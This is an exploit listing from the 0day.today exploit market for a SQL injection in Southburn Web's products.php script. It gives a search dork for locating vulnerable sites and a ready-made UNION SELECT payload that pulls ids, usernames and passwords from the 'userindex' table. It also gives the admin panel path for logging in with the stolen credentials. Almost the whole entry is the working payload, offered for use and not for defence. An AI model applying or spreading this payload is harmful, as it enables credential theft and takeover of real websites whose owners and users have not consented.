[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Southburn Web (products.php) Sql Injection Vulnerability

Author
AtT4CKxT3rR0r1ST
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10875
Category
web applications
Date add
13-02-2010
Platform
unsorted
========================================================
Southburn Web (products.php) Sql Injection Vulnerability
========================================================

.:. Script         : southburn Web [http://southburn.ca/]
.:. Bug Type       : Sql Injection[Mysql]
.:. Dork           : "Powered by: Southburn"

####################################################################

===[ Exploit ]===

www.site.com/products.php?id=null[Sql]&r=null

www.site.com/products.php?id=null'+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userindex-- -&r=null

Exploit:

'+and+1=2+union+select+1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+userindex-- -

Path admin:

www.site.com/admin/index.php
####################################################################



#  0day.today [2024-12-25]  #